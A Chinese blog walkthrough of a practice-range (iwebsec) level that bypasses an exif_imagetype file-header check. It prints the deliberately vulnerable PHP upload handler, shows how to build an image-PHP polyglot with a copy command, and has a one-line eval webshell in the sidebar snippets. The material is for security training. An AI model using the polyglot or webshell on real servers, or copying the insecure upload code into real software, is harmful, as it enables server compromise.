iwebsec靶场 文件上传漏洞通关笔记4-文件头过滤绕过

已于 2024-04-20 22:34:57 修改
阅读量689 收藏 10
点赞数 5
分类专栏: iwebsec靶场 网络安全 web渗透 文章标签: 安全 web安全 iwebsec 渗透测试 文件包含漏洞
于 2024-04-20 22:30:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128062560
版权

目录

1.打开靶场

2.源码分析

3.构建图片马

5.获取上传脚本url地址

6.访问上传脚本

文件上传漏洞通常是由于程序员在对代码中文件上传部分的控制不足或者处理缺陷,而导致黑客可以越过其本身权限向服务器上上传可执行的恶意脚本文件。本次通过iwebsec靶场文件上传的第四关来讲解如何通过图片马实现文件头绕过过滤。

1.打开靶场

iwebsec 靶场漏洞库

2.源码分析

如下所示为04.php的源码内容

<?php

  require_once('../header.php');
?>
<html>
<meta http-equiv="Content-Type" content="text/html;  charset=utf8"/>
	<head>
		<title>文件头过滤绕过</title>
	</head>
	<h2>文件头过滤绕过</h2>
		<div class="alert alert-success">
			<p>请上传PHP文件</p>
		</div>
	<body>
	
<form action="" enctype="multipart/form-data" method="post" 
name="uploadfile">上传文件:<input type="file" name="upfile" /><br> 
<input type="submit" value="上传" /></form> 
<?php 
if(is_uploaded_file($_FILES['upfile']['tmp_name'])){ 
$upfile=$_FILES["upfile"]; 
//获取数组里面的值 
$name=$upfile["name"];//上传文件的文件名 
$type=substr($name, strrpos($name, '.')+1);//上传文件的类型 
$size=$upfile["size"];//上传文件的大小 
$tmp_name=$upfile["tmp_name"];//上传文件的临时存放路径 
//判断是否为图片 
if(!exif_imagetype($_FILES['upfile']['tmp_name'])){
echo "<script>alert('请上传图片文件!')</script>";
die();
}else{

$error=$upfile["error"];//上传后系统返回的值 
echo "================<br/>"; 
echo "上传文件名称是:".$name."<br/>"; 
echo "上传文件类型是:".$type."<br/>"; 
echo "上传文件大小是:".$size."<br/>"; 
echo "上传后系统返回的值是:".$error."<br/>"; 
echo "上传文件的临时存放路径是:".$tmp_name."<br/>"; 

echo "开始移动上传文件<br/>"; 
//把上传的临时文件移动到up目录下面 
move_uploaded_file($tmp_name,'up/'.$name); 
$destination="up/".$name; 
echo "================<br/>"; 
echo "上传信息:<br/>"; 
if($error==0){ 
    echo "文件上传成功啦!"; 
    echo "<br>图片预览:<br>"; 
    echo "<img src=".$destination.">"; 
    //echo " alt=\"图片预览:\r文件名:".$destination."\r上传时间:\">"; 
    }
}
}

根据源码分析可知,使用exif_imagetype过滤函数来判断是否为图片,exif_imagetype()函数是PHP中的内置函数,读取一个图像的第一个字节并检查其签名,用于确定图像的类型。

if(!exif_imagetype($_FILES['upfile']['tmp_name'])){
echo "<script>alert('请上传图片文件!')</script>";
die();
}

3.构建图片马

(1)构造webshell

构造获取服务器php版本信息的脚本<?php phpinfo();?>,命名为info.php

(2)图片

 选择用于制作图片马的图片c.png, 如下所示

(3)制作图片马

使用copy命令构造图片马,命令如下

copy c.png/b + info.php/a info_png.php

生成的图片马命名为info_png.php

 4.上传图片马脚本

5.获取上传脚本url地址

如下所示上传成功,在预览图片处鼠标右键,选择复制图片地址

6.访问上传脚本

http://iwebsec.com:81/upload/up/info_png.php

需要鼠标一直向下滑动,直到看到获取到php的敏感信息脚本被成功执行

 如上所示,渗透成功

mooyuan天天
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DoraBox靶场(四)文件上传
Lorezon的博客
03-20 283
任意文件上传没啥说的,什么文件都可以。 JS限制文件上传 上传php文件,提示不允许上传,并给出了允许上传的文件类型。 先上传jpg文件,再抓包拦截改文件类型。 成功上传了php,蚁剑连接。 MIME限制上传 上传php文件,显示文件类型不正确。 经过测试,jpg文件可以成功上传。 抓包看php和jpg有什么不同。 两者的Content-Type值不相同。 把php的Content-...
iwebsec靶场 文件上传漏洞通关笔记2-第02 文件过滤绕过
mooyuan的博客
12-08 1134
分析可知仅对php后缀进行判断,而且是黑名单判断,只要是php后缀那就会提示失败,而其他类型则会成功。由于后缀仅判断php键字,故而可以考虑使用大小写绕过,比如说.PHP、.pHP、.PhP、.PHp等等,都可以绕过php键字过滤。由于后台源码仅过滤php后缀,那么可以通过大小写后缀绕过,构建脚本info2.pHp。随手上传脚本info.php,如下所示提示不能上传php文件。在图片预览处点击鼠标右键,选择复制图片地址。如下所示为02.php的源码内容。iwebsec 靶场漏洞库。
iwebsec靶场 解析漏洞通关笔记1-Apache解析漏洞
最新发布
mooyuan的博客
04-28 1217
Apache服务器在解析一个文件时,当文件有多个以点分隔的后缀时,如果右边的后缀无法识别(不在mime.types内),则继续从右向左识别,那么我们请求这样一个文件:ljn.php.aaa,遇到第一个扩展名 aaa ->发现无法识别,于是从右向左 识别第二个扩展名php -> 发现后缀是php可以识别,于是交给php 处理。
iwebsec靶场 文件包含漏洞通关笔记5-远程文件包含绕过
mooyuan的博客
04-20 1412
前言。
iwebsec靶场文件上传
果粒程
02-26 1400
iwebsec靶场文件上传
iwebsec文件上传漏洞-文件过滤绕过
qq_56041380的博客
03-29 568
各种文件都有特定的文件格式,开发者通过检查上传文件文件检测文件类型。但是这种检测方式同样可以被绕过,只要木马文件部添加对应的文件,这样既可以绕过检测,又不影响木马文件的正常运行。
PHP、Apache环境中部署upload-labs(文件上传漏洞靶场)
01-08
这就是 upload-labs(文件上传漏洞靶场)的价值所在。 upload-labs 是一款开源的练习 web 漏洞靶场工具,用 PHP 代码编写而成。需要 PHP 和 Apache 环境运行。下面我们将详细介绍如何在 PHP、Apache 环境中部署 ...
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
web-渗透-文件上传漏洞专题靶场.rar
03-14
靶场为二十一个文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
渗透测试上传漏洞经典靶场学习-upload-labs
07-02
渗透测试上传漏洞经典靶场学习-upload-labs
upload-labs-master【文件上传靶场
04-05
"upload-labs-master【文件上传靶场】" 是一个针对文件上传功能安全性的测试平台,主要目的是帮助开发者、安全人员以及爱好者检验和学习文件上传漏洞的防范措施。在这个靶场中,你可以模拟不同的攻击手段,了解如何...
常见面试题 (中文清晰版)
06-01
常见面试题 (中文清晰版) 简单明了好资料 面试好帮手
iwebsec靶场 文件包含漏洞通关笔记1-本地文件包含漏洞
mooyuan的博客
04-20 1739
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。
iwebsec靶场 数据库漏洞通关1-MySQL数据库漏洞
mooyuan的博客
11-24 1050
iwebsec靶场的数据库漏洞第一项内容为MySQL漏洞渗透,如下所示我们可以使用kali的msf模块对其进行渗透。
iwebsec靶场 中间件漏洞通关笔记3-Jboss中间件漏洞
mooyuan的博客
04-21 1153
JBoss是一套开源的企业级Java中间件系统,用于实现基于SOA的企业应用和服务,基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
iwebsec靶场SQL注入漏洞-字符型注入
qq_56041380的博客
03-23 507
字符型注入就是注入点的数据类型是字符型。字符型注入与数字型注入的区别就是字符型注入要用一对单引号引起来。
文件上传靶场通关
似水流年
11-01 1222
文件上传漏洞靶场通关 练习所需:靶场webshell、蚁剑/菜刀、Burpsuite 靶场下载 链接: https://pan.baidu.com/s/1qvqZWLZ-c69oHupCCGuyEQ 密码: 4qhp webshell 一句话shell <?php eval(@$_POST['bjx']); ?> 1、绕过前台脚本检测扩展名上传WebShell 直接上传,不允许 我们把phpshell.php后缀改为phpshell.png 然后上传,burp拦截数据包,将拦截的
搭建开源漏洞靶场iwebsec
zonei123的博客
01-07 3791
搭建开源漏洞靶场iwebsec
iis短文件名泄露漏洞工具
09-08
文件名泄露漏洞是指在IIS(Internet Information Services)服务器上,存在一种漏洞可以通过发送特定请求获得服务器上的短文件名信息。 该漏洞可以被黑客利用来获取服务器上的敏感文件名,进而进行其他恶意行为,如尝试访问这些文件、通过获得的信息进行进一步的入侵等。 为了测试和检测这种漏洞,一些安全研究人员和工具开发者开发了一些工具,可以模拟这种漏洞,并帮助系统管理员进行修复和防护。 这些工具可以通过发送特定的请求来检测IIS服务器是否存在短文件名泄露漏洞。一旦漏洞被发现,管理员可以采取相应的措施来修复漏洞,如更新IIS服务器的补丁、闭短文件名功能等,以增强服务器的安全性。 这些工具通常被设计为简单易用,可自动化检测和修复漏洞,帮助系统管理员降低风险并避免可能的攻击。 总之,IIS短文件名泄露漏洞工具可以帮助系统管理员快速检测和修复这种漏洞,提高服务器的安全性,保护系统和用户的敏感数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值